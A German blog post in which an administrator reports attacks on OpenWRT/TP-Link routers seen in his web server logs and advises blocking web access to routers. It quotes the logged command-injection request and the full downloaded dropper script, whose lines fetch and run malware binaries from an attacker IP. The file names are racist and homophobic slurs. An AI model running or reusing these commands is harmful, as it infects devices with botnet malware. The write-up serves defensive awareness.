Seiten

16.05.2024

Angriffe auf OpenWRT/TPLINK: Empfehlung: Erreichbarkeit der Router per http(s) abstellen

Bei einer Durchsicht meiner Logfiles habe ich zahlreiche Zugriffsversuche wie diesen bemerkt:

/var/log/apache2/home.fastix.org_access.log: 80.94.92.60 - - [15/May/2024:07:56:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 4167 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" 

Das Skript „/cgi-bin/luci/“ scheint zu OpenWRT zu gehören und  ohne Authentifizierung nicht nur eine (vorliegend  vom Angreifer vorgegebene) Datei aus dem Web zu laden, sondern auch auszuführen.

Ich habe das Skript tenda.sh mal herunter geladen (Von den gebrauchten Wörtern distanziere ich mich)):

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://94.156.8.244/mips; chmod +x lol; ./lol tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://94.156.8.244/mpsl; chmod +x lmao; ./lmao tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O faggot http://94.156.8.244/x86_64; chmod +x faggot; ./faggot tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O gay http://94.156.8.244/arm; chmod +x gay; ./gay tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O retard http://94.156.8.244/arm5; chmod +x retard; ./retard tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigger http://94.156.8.244/arm6; chmod +x nigger; ./nigger tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shit http://94.156.8.244/arm7; chmod +x shit; ./shit tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigga http://94.156.8.244/i586; chmod +x nigga; ./nigga tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw http://94.156.8.244/i686; chmod +x kekw; ./kekw tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what http://94.156.8.244/powerpc; chmod +x what; ./what tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys http://94.156.8.244/sh4; chmod +x kys; ./kys tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shiteater http://94.156.8.244/m68k; chmod +x shiteater; ./shiteater tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O blyat http://94.156.8.244/sparc; chmod +x blyat; ./blyat tplink 

Hm. Das es ein Angriff ist, ist klar. Die IP 94.156.8.244 gehört laut den Whois-Daten zu einer SilentConnectionLtd in Bulgarien, die IP 80.94.92.60  zu einem Serveranbieter, der sich selbst sorgfältig  zu verstecken versucht... Die Wortwahl im Skript  „tenda.sh“ verweist auf einen homosexuellen Nazi, der sich wohl etwas großes in der Hinterpforte wünscht. Dem „faggot“ nach will er danach noch daran... lassen wir das.

Betroffen sind scheinbar Nutzer von OpenWRT und/oder TPLINK-Routern. Diese sollten dafür Sorge tragen, dass die Router nicht aus dem Web erreichbar sind. Auch nicht aus dem eigenem Netz, denn solche Links sind schnell per Mail & Co. untergeschoben.

Fortinet hat das ebenfalls untersucht...

Eine Anmerkung noch: Auch wenn es bereits Updates gab: Mein Vertrauen  in die Fähigen desjenigen, der das „luci“-Skript geschrieben hat, läge auf dem Niveau des Vertrauens in „Luci-fer“.

Keine Kommentare:

Kommentar veröffentlichen